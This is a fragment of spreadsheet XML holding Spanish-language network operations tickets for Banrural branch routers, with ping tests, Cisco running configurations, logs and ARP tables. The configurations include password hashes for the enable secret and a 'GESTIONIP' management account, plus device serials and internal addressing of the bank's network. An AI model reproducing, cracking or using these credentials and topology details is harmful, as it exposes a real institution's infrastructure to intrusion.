                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL A CARGO NOS INDICA QUE SE OBSERVA ESTABILIDAD EN EL SERVICIO Y SIN PERDIDAS.
PING 172.19.21.162: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 172.19.21.162 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 76/76/86 MS
PODRÍA APOYARNOS EN VALIDAR EL FUNCIONAMIENTO ACTUAL DE SU LADO YA QUE DEL NUESTRO NO SE OBSERVARON EVENTOS Y NO SE REALIZÓ CORRECCIÓN.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4608181</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE OPERATIVO SE ENCUENTRA QUE YA ESTA OPERATIVO A NIVEL WAN SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL EN EL EQUIPO DE ULTIMA MILLA YA UQE EL ROUTER SI TIENE PROTECCION.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 3 DÍA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735 UPTIME IS 3 DAYS, 10 HOURS, 35 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 12:13:55 GUA SUN NOV 6 1904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7Y18R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7Y18R
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0735#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4143 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0735
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
NO IPV6 CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1617Y18R
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.108.33 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8900804T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.105.44.202 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/8901627T/_/
 BANDWIDTH 2000
 IP ADDRESS 10.105.42.233 255.255.255.240
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0/0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/3
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.137.35.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.167.35.126 255.255.255.0
 RATE-LIMIT INPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.105.44.202
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.105.44.192 0.0.0.15 AREA 164
 NEIGHBOR 10.105.44.193
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.105.42.225 200 NAME REDUNDANTE
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.167.35.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.108.33/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.137.35.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NUEVO PROGRESO EDIF. MUNICIPAL SAN MARCOS NUEVO PROGRES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735#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 3 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 55 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 55 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 59 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.571: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
NOV  6 18:14:00.167: %MAINBOARD-3-RTC_BATTERY_FAILURE: REAL TIME CLOCK (RTC) OSCILLATOR PROBLEM DETECTED, POSSIBLY CAUSED BY RTC BATTERY FAILURE
NOV  6 18:14:11.779: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
NOV  6 18:14:16.603: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO RESET
NOV  6 18:14:16.603: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO RESET
NOV  6 18:14:17.587: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
NOV  6 18:14:17.799: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
NOV  6 18:14:17.799: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
NOV  6 18:14:18.651: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
NOV  6 18:14:18.651: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
NOV  6 12:14:18.819 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 18:14:18 UTC SUN NOV 6 1904 TO 12:14:18 GUA SUN NOV 6 1904, CONFIGURED FROM CONSOLE BY CONSOLE.
NOV  6 12:14:19.043 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
NOV  6 12:14:19.879 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
NOV  6 12:14:20.875 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
NOV  6 12:14:21.019 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
NOV  6 12:14:21.019 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
NOV  6 12:14:21.019 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
NOV  6 12:14:21.267 GUA: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
NOV  6 12:14:21.571 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2012 BY CISCO SYSTEMS, INC.
COMPILED WED 29-FEB-12 19:19 BY PROD_REL_TEAM
NOV  6 12:14:21.751 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0735 IS UNDERGOING A COLD START
NOV  6 12:14:22.371 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
NOV  6 12:14:22.371 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
NOV  6 12:14:22.371 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
NOV  6 12:14:22.371 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
NOV  6 12:14:22.371 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
NOV  6 12:14:22.375 GUA: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.212.108.33 IN NSSA 164 - P-BIT CLEARED
NOV  6 12:14:33.643 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
NOV  6 12:14:34.643 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
NOV  6 12:14:44.415 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  6 12:14:51.875 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
NOV  6 12:15:22.883 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  6 12:32:09.671 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  6 12:32:18.951 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  6 12:34:07.683 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  6 12:34:14.531 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  6 16:36:57.862 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  6 16:37:08.918 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  6 16:37:13.886 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  6 16:37:22.234 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  8 22:50:01.725 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  8 22:50:04.593 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  8 22:53:04.925 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  8 22:53:14.825 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  9 13:33:00.445 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  9 13:33:03.181 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  9 13:39:02.265 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  9 13:39:08.021 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  9 13:40:17.185 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  9 13:40:17.189 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  9 13:41:50.977 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  9 13:42:08.217 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  9 17:41:24.216 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  9 17:41:33.572 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
NOV  9 21:49:16.255 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.204 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
NOV  9 21:49:37.395 GUA: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.105.44.193 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0735#
SHOW CLOCK
22:49:06.867 GUA WED NOV 9 1904
CC_BANRURAL_GT_AGENCIA_0735#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.105.42.233           -   2C54.2D28.F9E1  ARPA   GIGABITETHERNET0/1
INTERNET  10.105.44.193           0   341E.6B53.1AD8  ARPA   GIGABITETHERNET0/0
INTERNET  10.105.44.202           -   2C54.2D28.F9E0  ARPA   GIGABITETHERNET0/0
INTERNET  10.105.44.204          19   C4B8.B412.46B4  ARPA   GIGABITETHERNET0/0
INTERNET  10.137.35.17            -   2C54.2D28.F9E3  ARPA   VLAN1
INTERNET  10.137.35.22            0   F08E.DB17.937A  ARPA   VLAN1
INTERNET  10.167.35.126           -   2C54.2D28.F9E3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0735#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8900804T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8901627T/_/
FA0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0735#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.105.44.202   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.105.42.233   YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5                  10.212.108.33   YES NVRAM  UP                    UP
VLAN1                      10.167.35.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0735#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.105.44.202
  PING 10.105.44.202: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.44.202 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.76
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.105.44.202
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.105.44.202/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t xml:space="preserve">NO  SE ALCANZA A NIVEL GUAN SE PORCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE.
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN BANRURAL 10.105.44.202
  PING 10.105.44.202: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.44.202 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.76
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.105.44.202
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.105.44.192/28  DIRECT  0    0             D   10.105.44.193   VLANIF184			</t>
  </si>
  <si>
    <t>F4608192</t>
  </si>
  <si>
    <t xml:space="preserve">EL ENLACE YA SE ENCUENTRA OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL YA QUE EL CPE TIENE PORTECCION DE ENERGIA PERO NO EL EQUIPO DE ULTIMA MILLA
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 4 DÍ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130 UPTIME IS 4 DAYS, 17 HOURS, 11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586MS
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
255488K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX183586MS
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0130#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4232 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0130
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$FAAE$9FYGUHDAG4GA3IDUUXXG9.
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX183586MS
!
!
USERNAME GESTIONIP SECRET 5 $1$0A0F$HVLRU3JNLN/7EC.PHEDYP/
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.122.43 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901936T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.16.245.157 255.255.255.224
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/8902324T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.16.127.51 255.255.255.192
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 SWITCHPORT ACCESS VLAN 184
 NO IP ADDRESS
 LOAD-INTERVAL 30
 SHUTDOWN
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.131.30.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.161.30.126 255.255.255.0
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
INTERFACE VLAN184
 NO IP ADDRESS
!
ROUTER OSPF 1
 ROUTER-ID 10.16.245.157
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.16.245.128 0.0.0.31 AREA 164
 NETWORK 10.212.122.43 0.0.0.0 AREA 164
 NEIGHBOR 10.16.245.129
!
